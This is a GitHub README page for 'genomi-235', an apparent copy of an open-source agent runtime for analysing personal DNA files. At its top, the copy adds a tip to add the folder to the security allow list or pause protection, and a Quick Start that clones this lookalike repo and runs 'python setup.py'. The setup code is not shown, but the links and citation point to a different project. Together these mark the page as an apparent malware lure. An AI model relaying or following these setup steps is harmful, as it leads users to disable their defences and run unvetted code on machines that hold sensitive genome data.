Skip to content

rectangledeanproxy/genomi-235

Genomi logo
Your genome. Decoded.
Website · Install guide · 简体中文

Python MCP Skill Local-first License

Genomi

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/rectangledeanproxy/genomi-235.git
cd genomi-235
python setup.py

Am I going bald? What does my DNA say about Alzheimer's risk? Why does ibuprofen do nothing for me?

DNA is the layer underneath all of that. It shapes the proteins, enzymes, receptors, and pathways behind nutrition, medication response, sleep, exercise, inherited traits, and risk for some conditions. Not destiny. But the most personal data you carry.

And it is overwhelming. ~3 billion base pairs, 20,000+ genes, millions of observed variants per person. No clinician, no lab, no individual holds that in their head. It is too much.

We live in an era where AI can take on tasks that were not possible before, at scales never seen before. Your genome is exactly that kind of task. And for the first time, we have the tools to actually read it at the scale it lives at.

Genomi is an open-source AI agent runtime that turns your AI agent into a personal DNA expert. Works with Claude Code, Codex, OpenClaw, Hermes, and any MCP-capable host. It gives the agent a private workspace: your variants in a local Active Genome Index, public genetics evidence ready to query, memory of what you explored, and report tools that turn DNA questions into evidence-backed answers. Your genome stays on your machine. The agent does the work.

Launch video

Genomi launch video

See it in action

TL;DR

Even TL;DR is too long, just paste this to your agent:

Hey please read this and tell me why Genomi is different from other AI
agent harnesses. Why is this actually useful for understanding my DNA privately?
https://raw.githubusercontent.com/exon-research/genomi/master/llms-full.txt

Just Install It

Install it through your agent. Paste one instruction, answer a few questions, and let your agent wire up the runtime:

Install and configure Genomi by following the instructions here:
https://raw.githubusercontent.com/exon-research/genomi/master/INSTALL_FOR_AGENTS.md

The install guide covers dependency checks, library selection, MCP registration, optional genome-source import, and verification. If Genomi is already packaged or otherwise present, the canonical install/update path is genomi install or the MCP operation genomi.install; the source bootstrap is only for hosts that do not have Genomi yet.

Works With Every Agent

Genomi is not tied to one chat app. Any agent host that can use MCP tools, local commands, or installed skills can talk to the same local Genomi runtime.

Host family How Genomi connects
Claude Code MCP server plus Genomi skills
Codex CLI MCP server plus Genomi skill
OpenCode, OpenClaw, Hermes MCP server plus host skill where supported
Cursor, Gemini CLI, Cline, Goose, Roo Code, Windsurf, Claude Desktop MCP server
Any other MCP-capable host genomi serve over stdio

One local Genomi home can hold the public libraries, Active Genome Index records, score caches, and journals. Session access still follows Genomi's approval rules, but the underlying evidence workspace is reusable across host agents.

Or If You Prefer The Old-School Way

Clone, install, point your MCP-capable agent at it. Same flow the installer script runs, just done by hand. The install guide for agents is the canonical reference — if anything below drifts from it, that doc wins.

git clone git@github.com:rectangledeanproxy/genomi-235.git ~/.genomi/genomi
cd ~/.genomi/genomi

every default reference library so Genomi can answer real questions without stopping later to fetch missing data. Use a smaller purpose from the catalog only when disk, bandwidth, or time is constrained (common-questions, medication-response, ancestry-context, sequence-and-regions, cell-and-tissue, everything, or setup-only):

export GENOMI_HOME=~/.genomi
python3 scripts/install_for_agents.py --libraries everything

The installer creates a stable command at $GENOMI_HOME/bin/genomi. Add it to PATH if you want genomi available from any shell:

export PATH="$GENOMI_HOME/bin:$PATH"

Once the genomi command exists, use it for install/update:

genomi install --libraries everything
{
  "mcpServers": {
    "genomi": {
      "command": "/absolute/path/to/GENOMI_HOME/bin/genomi",
      "args": ["serve"]
    }
  }
}

For a source checkout where the stable shim is unavailable:

{
  "mcpServers": {
    "genomi": {
      "command": "bash",
      "args": ["-lc", "cd /path/to/genomi && PYTHONPATH=src python3 -m genomi serve"]
    }
  }
}

Reload your host's MCP servers. For URL-based ingestion, llms.txt is the compact public map and llms-full.txt is one inlined reference file.

Ask It Things Like

Once Genomi is wired up, you talk to the agent like this. In Codex, use $genomi instead of /genomi. The quick stuff first:

/genomi What does my DNA say about Alzheimer's risk?

/genomi Am I at risk for early heart disease?

/genomi Am I going bald?

/genomi Am I a fast or slow metabolizer?

/genomi Should I worry about diabetes?

/genomi Am I lactose intolerant?

/genomi Is alcohol bad for me specifically?

Then hand it something bigger:

/genomi I'm about to start an SSRI. Walk me through my CYP2D6 and CYP2C19 status, what the major guideline sources say about dosing, and what's preliminary vs actually actionable.

/genomi Run a pharmacogenomic review across every medication I take. Lead with guideline-backed dose adjustments. Flag lower-evidence signals second. Tell me what's outside scope.

/genomi Build me a one-page rare-disease workup for my HPO terms. Rank candidate genes by source-backed evidence, cite each call, and show me what's missing before this is worth taking to a clinician.

Or just hand it the whole thing:

/genomi decode

One command. The agent sweeps every capability across your genome — variants, ClinVar, pharmacogenomics, ancestry, polygenic scores, nutrigenomics, and your investigation journal — and serves the result as a self-contained dashboard on localhost. Open the URL in a browser.

Behind those, Genomi gives the agent grounded tools across 20,000+ human genes, millions of genotype observations from your file, and the public evidence sources that keep the answer honest.

What Genomi Provides

Layer What you get
Active Genome Index A local, queryable ledger of alleles, zygosity, quality, depth, filters, and callability context from your genome source.
Evidence Library Focused tools for variants, ClinVar, GWAS, HPO, pharmacogenomics, ancestry context, PRS, and sequence utilities.
Journal A running log of what you explored, what mattered, and which evidence supported it.
Skills Agent instructions for routing questions, asking for approval, preserving source priors, and answering clearly.

Bringing your own genome

Genomi reads your DNA from wherever it already lives. Point it at any VCF or gVCF you have on disk — clinical exports, research callsets, anything that follows the spec — and the rest of the pipeline reuses the same Active Genome Index regardless of where the file came from.

Direct-to-consumer providers are supported natively too. Hand Genomi the deliverable straight from your account export and it figures out the rest:

  • 23andMe, AncestryDNA, MyHeritage, FamilyTreeDNA (Family Finder), and Living DNA — raw genotype text/CSV as exported by the provider, including gzip/bzip2/xz-compressed files and zip/tar archives.
  • Nebula Genomics, Dante Labs, and Sequencing.com — their VCF deliverables are recognized and tagged with the originating provider.
  • Nebula / Dante / Sequencing.com FASTQ — paired-end raw reads are aligned locally from sibling R1/R2 files or a zip/tar archive containing the pair (minimap2 for long reads, bwa-mem2 for short reads), sorted, and then fed into the same BAM → derived-VCF path. The wgs-alignment install purpose pulls down both aligners.

No DNA file yet? Try a public one

If you don't have your own genome yet but want to see what Genomi actually does, the Personal Genome Project — Harvard Medical School publishes real consumer-DNA deliverables from real participants. Their catalog includes public examples for the common consumer-array, VCF, gVCF, BAM, and paired FASTQ shapes above; the checked public inventory did not include a Living DNA example, even though Genomi supports that export shape. Pick a matching participant export, point Genomi at it, and ask questions. It is the cleanest way to kick the tires without sequencing yourself.

Genome data is optional; Genomi also handles public-only genetics questions.

Why We Built This

I built Genomi because I want AI to take on the things it never could before, at the scale it never could before — and DNA is exactly that.

A single human genome is overwhelming. Labs spend careers on one gene. Reports flatten thousands of variants into a single line. Even the best clinician cannot hold 20,000+ genes and millions of genotype observations in their head. That is not a limitation of effort. It is a limitation of scale. And it is the kind of limitation AI is finally good enough to push against.

I want this for my own health. I want it for my family's health. And I want it to be honest — grounded in real evidence, local by default, with the agent showing its work instead of guessing from memory.

Raw genome files stay on your machine. Genomi is a workspace, not a static PDF report. Answers trace back to a source record or they don't get to call themselves answers. And the whole thing is built for agents over MCP from the start, not bolted on after.

Generic AI can explain genetics. It should not guess when the question depends on an exact variant, your genome file, a guideline source, or a coverage limitation. Genomi gives the agent the tools for the parts that need evidence, and stays out of the way for the rest.

What Genomi Can Help Explore

Genomi is not a static report. It is a private workspace your agent can use to ask better questions across different parts of your genome.

  • Traits and everyday responses: lactose, caffeine, alcohol, taste, nutrition, sleep, exercise, and similar personal questions.
  • Medication response: genes and variants that may affect how your body handles specific drugs.
  • Carrier and inherited-risk context: exact variant checks, ClinVar assertions, and gene-disease evidence.
  • Common-trait research: GWAS and published score context for complex traits, with clear limits.
  • Rare-disease and phenotype review: HPO terms, gene-disease validity, and source-backed candidate comparisons.
  • Ancestry reference-panel context: qualitative reference-panel similarity and overlap checks, not race or ethnicity prediction.
  • Reports and memory: cited Markdown reports and a journal of what you explored, what mattered, and what still needs follow-up.

How Genomi Keeps Answers Honest

DNA questions can be personal, messy, and easy to overstate. Genomi keeps the pieces separated so an agent can show its work.

  • Your genome evidence: genotype, zygosity, depth, quality, filters, exact allele observation, and callability.
  • Public evidence: ClinVar assertions, population frequencies, GWAS records, gene-disease validity, phenotype annotations, and source versions.
  • Reviewed findings: narrow source-backed notes recorded for a specific target or question.
  • Agent memory: observations, decisions, unresolved questions, and links back to evidence.
  • Personal context: optional phenotype, medications, family history, or other details you choose to provide.

Different evidence families can point in different directions. Genomi helps the agent compare them without pretending that one database is the whole truth.

Privacy

Genomi keeps the most sensitive data close to you.

  • Raw genome sources stay on the user's machine.
  • Genomi creates Active Genome Index records for personal genome files locally so agents query only the variants needed for the current question.
  • Genomi asks for current-session approval before read operations use existing Active Genome Index artifacts, unless they belong to the configured default user.
  • Public lookups use selected targets such as rsIDs, genes, drugs, conditions, or guideline questions.
  • Journal entries are agent-authored memory, not evidence.
  • Project journals reject private/sample evidence links.
  • Memory exports omit private evidence links unless explicitly requested and approved.

Sources, Libraries, And Attribution

Genomi talks to trusted, verified databases and specialist genomics tools so your agent can ground answers in real evidence instead of vibes. Install-time downloads write source manifests where possible. Live adapters return source URLs and access context in their result envelopes. Reviewed source families are not treated as background knowledge; agents cite or journal the specific source records they used.

Installed Genomi libraries:

  • ClinVarclinvar-grch38 and clinvar-grch37 VCF caches for exact variant interpretation lookup.
  • Human Phenotype Ontologyhpo phenotype-to-gene and disease annotation files.
  • GenCCgencc gene-disease validity submissions.
  • UCSC Genome Browser downloadsreference-grch38 and reference-grch37 hg38/hg19 FASTA files for sequence, normalization, and callability workflows.
  • UCSC liftOver chain filesliftover-chains for GRCh37/GRCh38 coordinate translation.
  • GENCODEgencode-grch38 and gencode-grch37 transcript annotation GTFs.
  • ENCODE SCREENencode-ccre-grch38 candidate cis-regulatory element annotations.
  • PanglaoDB and CellMarker 2.0panglaodb-markers and cellmarker-human marker tables.
  • MSigDB Hallmarkmsigdb-hallmark, installed only from a user-supplied official GMT export or URL.
  • PharmCAT and PharmGKBpharmcat all-in-one JAR for pharmacogene diplotypes, phenotypes, and recommendation artifacts.
  • 1000 Genomes 30x GRCh38ancestry-1000g-30x-grch38 compact ancestry PCA panel, distributed from the genomi-ancestry-panel build project. ancestry-1000g-30x-grch37 is derived locally from that panel with UCSC liftOver chains.
  • minimap2 and bwa-mem2minimap2-binary and bwa-mem2-binary for optional FASTQ alignment. BAM/FASTQ workflows also use samtools and bcftools when those tools are needed on the host.

Live public adapters and configured public data:

Reviewed source families:

How It Works

Genomi exposes a small base MCP surface plus a dispatcher for specialized genomics tools. The host agent does the conversation; Genomi does the grounded lookup, Active Genome Index creation, evidence retrieval, and report assembly.

above for the config snippet.

Genomi parses the file into an Active Genome Index: a local query substrate for variants, zygosity, quality, depth, filters, and callability context. Public-only questions do not require a genome file.

{
  "tool": "genomi.parse_source",
  "params": {
    "source": "<genome-file>"
  }
}

Base operations such as genomi.parse_source, genomi.describe_context, and journal.append_entry are direct MCP tools. Capability operations go through genomi.invoke after the agent reads the matching skills/<capability>/SKILL.md.

{
  "tool": "genomi.invoke",
  "params": {
    "tool": "variant.resolve",
    "params": {
      "rsid": "rs429358"
    }
  }
}

Genomi results include structured evidence, source coverage, and defaults_applied where assumptions matter. Missing libraries, unavailable external sources, and background jobs return explicit statuses instead of being treated as negative evidence.

The Journal records observations, decisions, unresolved questions, and evidence links.

Status

Warning

Experimental. Research and informational use only. Genomi is not a diagnostic device. It does not replace qualified clinical review for diagnosis or treatment. Raw genome data stays on your machine by design — but you are still responsible for how you share what comes out of it.

The schema, tool surface, and capability layout are still moving — pin a commit if you need stability across upgrades.

License

Genomi is released under the Apache License 2.0.

Citation

If you use Genomi in research, publications, reports, benchmarks, demos, or derived tools, please cite the project using CITATION.cff and acknowledge Genomi where appropriate.

@software{genomi2026,
  title = {Genomi: A Local Genomics Harness for AI Agents},
  author = {Zeng, Mingde and Zhou, Hongjian and Liu, Fenglin and Wu, Jinge},
  year = {2026},
  url = {https://www.genomiagent.com/},
  version = {0.1.0}
}

Contributing

Issues and pull requests welcome. If you are reporting a bug, include the genome source format (VCF / gVCF / 23andMe / AncestryDNA / etc.), the operation you ran, and the structured error envelope the agent received — that is usually enough to reproduce.

Acknowledgements

Genomi owes a direct implementation debt to the Personal Genome Project — Harvard Medical School public genetic data catalog.

That same PGP-HMS public dataset also did the unglamorous work of letting Genomi support these provider shapes natively. Detectors, column quirks, header banners, archive wrappers, and provider-tagged VCF paths are sanity-checked against real PGP participant exports when the public catalog contains that format. Native 23andMe, AncestryDNA, MyHeritage, FamilyTreeDNA, Nebula, Dante, Sequencing.com, VCF, gVCF, BAM, and FASTQ coverage benefits directly from those examples; Living DNA remains a supported format, but the checked PGP-HMS public inventory did not include a Living DNA example.

Thanks also to GBrain, Garry Tan's OpenClaw/Hermes agent-brain project, for inspiration around making agent systems source-grounded, memory-aware, and useful from a single fetched documentation entry point.

About

An open-source agent harness that turns your AI agent into your personal DNA expert

Topics

Resources

License

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages